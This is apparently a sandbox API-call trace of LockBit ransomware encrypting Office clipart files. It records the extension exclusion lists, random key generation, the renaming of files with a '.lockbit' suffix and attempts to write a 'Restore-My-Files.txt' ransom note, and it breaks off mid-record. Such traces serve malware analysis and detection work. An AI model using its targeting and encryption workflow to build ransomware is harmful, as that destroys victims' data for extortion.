lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.452] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.453] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.453] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285808.WMF.lockbit") returned 72 [0154.453] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285808.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285808.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0154.457] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.457] malloc (_Size=0x40068) returned 0x3e70008 [0154.457] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=9204) returned 1 [0154.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0154.458] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0154.458] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0154.460] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285808.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285808.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.460] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.460] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.462] free (_Block=0x1fa2ed8) [0154.462] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285808.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.462] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.462] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.462] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56667970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2210, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285820.WMF", cAlternateFileName="")) returned 1 [0154.462] lstrcmpiW (lpString1=".", lpString2="J0285820.WMF") returned -1 [0154.462] lstrcmpiW (lpString1="..", lpString2="J0285820.WMF") returned -1 [0154.462] PathFindExtensionW (pszPath="J0285820.WMF") returned=".WMF" [0154.462] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.462] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.462] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.462] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.462] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.463] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.463] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.464] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285820.WMF") returned 1 [0154.464] lstrcmpiW (lpString1="ntldr", lpString2="J0285820.WMF") returned 1 [0154.464] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285820.WMF") returned 1 [0154.464] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285820.WMF") returned -1 [0154.464] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285820.WMF") returned -1 [0154.464] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285820.WMF") returned 1 [0154.464] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285820.WMF") returned -1 [0154.464] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.464] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285820.WMF") returned=".WMF" [0154.464] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.465] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.465] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.466] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.466] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285820.WMF.lockbit") returned 72 [0154.466] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285820.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285820.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0154.466] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.466] malloc (_Size=0x40068) returned 0x3ef0008 [0154.467] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=8720) returned 1 [0154.467] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.467] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0154.467] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.467] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0154.468] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0154.472] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285820.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285820.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.472] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.472] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.473] free (_Block=0x1fa2ed8) [0154.473] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285820.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.473] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.473] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.473] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56667970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x21a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285822.WMF", cAlternateFileName="")) returned 1 [0154.473] lstrcmpiW (lpString1=".", lpString2="J0285822.WMF") returned -1 [0154.473] lstrcmpiW (lpString1="..", lpString2="J0285822.WMF") returned -1 [0154.473] PathFindExtensionW (pszPath="J0285822.WMF") returned=".WMF" [0154.473] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.473] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.473] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.473] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.474] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.475] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.475] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285822.WMF") returned 1 [0154.475] lstrcmpiW (lpString1="ntldr", lpString2="J0285822.WMF") returned 1 [0154.475] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285822.WMF") returned 1 [0154.475] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285822.WMF") returned -1 [0154.476] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285822.WMF") returned -1 [0154.476] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285822.WMF") returned 1 [0154.476] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285822.WMF") returned -1 [0154.476] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.476] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285822.WMF") returned=".WMF" [0154.476] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.476] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.476] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.477] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.477] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.477] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.477] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.477] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.477] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.477] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.477] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.477] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.477] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.477] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285822.WMF.lockbit") returned 72 [0154.477] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285822.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285822.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0154.482] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.482] malloc (_Size=0x40068) returned 0x1ff1e60 [0154.482] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8608) returned 1 [0154.482] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.483] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0154.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.483] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0154.483] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.485] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285822.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285822.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.485] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.486] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.487] free (_Block=0x1fa2ed8) [0154.487] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285822.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.487] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.487] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.488] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5668dad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7898, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287018.WMF", cAlternateFileName="")) returned 1 [0154.491] lstrcmpiW (lpString1=".", lpString2="J0287018.WMF") returned -1 [0154.491] lstrcmpiW (lpString1="..", lpString2="J0287018.WMF") returned -1 [0154.491] PathFindExtensionW (pszPath="J0287018.WMF") returned=".WMF" [0154.491] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.491] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.491] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.491] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.491] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.491] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.491] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 